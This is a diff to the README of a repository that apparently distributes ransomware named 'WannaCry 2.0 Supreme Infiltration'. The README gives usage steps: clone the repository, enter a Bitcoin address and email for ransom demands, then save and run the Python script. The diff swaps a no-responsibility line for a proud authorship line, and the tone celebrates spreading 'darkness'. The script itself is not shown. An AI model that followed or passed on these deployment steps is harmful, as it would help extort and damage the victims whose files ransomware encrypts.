1cYinfinity/WannaCry-2.0-Supreme-Infiltration/README.md

 💻 Usage:
 1. Clone this repository.
 2. Customize Bitcoin address and email for ransom demands.
-3. Run the script, and watch as the darkness spreads!
+3. Save the script as: `WannaCry_2.0_Supreme_Infiltration.py`
+4. Run the script: `python WannaCry_2.0_Supreme_Infiltration.py`

 🚨 Disclaimer: This creation is for educational purposes only.
-The author assumes no responsibility for its misuse.
+The author, 1cYinfinity, proudly presents this work.

 ⚠️ Use with caution.
 The shadows may not always shield you.